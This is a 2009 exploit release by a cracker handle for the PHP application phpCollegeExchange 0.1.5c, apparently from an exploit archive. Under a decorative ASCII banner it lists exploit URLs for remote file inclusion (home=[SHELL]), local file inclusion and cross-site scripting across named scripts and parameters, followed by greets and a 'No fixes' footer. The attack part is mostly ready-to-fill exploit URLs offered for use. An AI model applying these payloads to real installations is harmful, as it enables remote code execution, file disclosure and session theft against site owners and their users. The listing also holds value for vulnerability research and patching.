phpCollegeExchange 0.1.5c (RFI-LFI-XSS) Multiple Vulnerabilities

2009-06-23 21:01:16

┌┌─────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└─────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Remote File Include ] [ Local File Include ] [ XSS ] ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Script : phpCollegeExchange 0.1.5c │ │ Register Globals : │
│ Download : sourceforge.net │ │ │
│ Method : GET │ │ [█] ON [ ] OFF │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : system information │ │ │
│ ───────────────────────────────────────┘ └────────────────────────────────────── │
│ DALnet #crackers ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │

┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘

[RFI]

http://localhost/path/i_head.php?home=[SHELL]
http://localhost/path/i_nav.php?home=[SHELL]
http://localhost/path/user_new_2.php?home=[SHELL]
http://localhost/path/books/allbooks.php?home=[SHELL]
http://localhost/path/books/home.php?home=[SHELL]
http://localhost/path/books/mybooks.php?home=[SHELL]


[LFI]

http://localhost/path/house/myrents.php?home=[LFI]


[XSS]

http://localhost/php pages/home.php?_SESSION[handle]=[XSS]
http://localhost/path/i_head.php?home=[XSS]
http://localhost/path/i_nav.php?home=[XSS]
http://localhost/path/books/allbooks.php?home=[XSS]
http://localhost/path/books/allbooks.php?_SESSION[handle]=[XSS]
http://localhost/path/books/home.php?home=[XSS]
http://localhost/path/books/home.php?_SESSION[handle]=[XSS]
http://localhost/path/books/i_nav.php?home=[XSS]



└──────────────────────────────────────────────────────────────────────────────────┘

Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL, rd0 .

┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2009 ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘

#

Fixes

No fixes

In order to submit a new fix you need to be registered.